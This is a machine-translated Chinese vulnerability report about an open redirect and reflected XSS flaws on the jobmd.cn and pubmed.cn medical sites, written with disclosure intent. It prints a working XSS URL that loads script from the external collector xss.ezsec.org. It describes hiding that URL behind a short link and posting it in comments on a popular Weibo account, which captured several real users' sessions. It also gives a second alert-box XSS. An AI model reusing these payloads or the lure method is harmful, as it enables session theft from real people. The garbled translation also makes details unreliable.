Clove garden a few small gift packs, xss + url jump details: http://paper.pubmed.cn/do.php? Ac = login & rfu = http://paper.pubmed.cn/rfu on address not verified http://paper.pubmed.cn/do.php? Ac = login & rfu = (any link can be constructed to jump to) I 'd like to talk about xss. I don't know if a gift package-Jianxin is still unavailable. This time I am still the same as last time. Let's use it. I checked the xsstest for the search at http://www.jobmd.cn/articlesite. I submitted it before, but I have never done it before. I thought about it this time and wanted to spread it in the form of a post on the forum. But the new registration cannot pass the invitation, but does not want to register by phone. What should I do? I suddenly thought of a good idea, that is, using @ fenng's Weibo as a stepping stone (dahuige's Weibo is something that many people see, therefore, someone will log on to the clove garden account .) Build code: http://www.jobmd.cn/article/search.htm? Keywords = % 3C % 2 Ftitle % 3E % 3 Cscript + src % 3D % 22 http % 3A % 2F % 2Fxss.ezsec.org % 2F % 3Fu % 3Df71717% 22 + % 3E % 3C % 2 fscript % 3E & category =-1 & action = Search & action_search = this time is still too long, we moved down through url.cn to make him more concise: http://url.cn/E273r7 was then posted to fenng's Weibo comments via Weibo. (With the nature of a social worker) It was not long before several users were recruited.
Obtained information:
Hazards: Reflection XSS is used well, which can cause great harm ~ There is also a xss, also sent by the way, this is your own, also in the internal test, good repair next http://pubmed.cn/index.php? St = "> <script> alert (1) </script> the XSS st parameter on the home page is not filtered out.
Repair suggestions:Url jump: Add a Token for validity verification under the referer restriction. Xss: Filter key points and leave the title blank. Security is a whole, not a part.